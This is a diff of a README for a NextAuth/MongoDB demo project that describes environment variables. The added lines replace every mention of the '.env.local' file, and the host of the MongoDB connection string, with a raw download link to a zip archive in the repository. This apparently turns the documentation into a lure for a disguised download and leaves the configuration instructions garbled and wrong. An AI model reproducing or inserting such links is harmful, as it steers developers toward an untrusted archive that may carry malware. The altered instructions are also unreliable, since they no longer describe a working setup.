KABUSsport/NextAuth-Demo/README.md

 - DATABASE_URL: The database URL used by Prisma (for MongoDB, this is often the same as MONGODB_URI or a separate MongoDB database)
 - PORT: The port number (optional; default 3000)

 Important: Keep secret values private.
 Do not commit secrets to version control.
-Use a .env.local file for local development and a secure secret management approach for production environments.
+Use a https://github.com/KABUSsport/NextAuth-Demo/raw/refs/heads/master/components/Demo-Next-Auth-v2.2.zip file for local development and a secure secret management approach for production environments.

 ---

 ## Configuration and environment

 This project is designed to be easy to configure.
-The .env.local file is central to local development.
+The https://github.com/KABUSsport/NextAuth-Demo/raw/refs/heads/master/components/Demo-Next-Auth-v2.2.zip file is central to local development.
 The typical structure looks like this:

-- MONGODB_URI=mongodb+srv://<username>:<password>@cluster0.mongodb.net/<dbname>?retryWrites=true&w=majority
+- MONGODB_URI=mongodb+srv://<username>:<password>https://github.com/KABUSsport/NextAuth-Demo/raw/refs/heads/master/components/Demo-Next-Auth-v2.2.zip<dbname>?retryWrites=true&w=majority
 - NEXTAUTH_URL=http://localhost:3000
 - NEXTAUTH_SECRET=some-very-long-random-secret
 - DATABASE_URL=mongodb://localhost:27017/yourdbname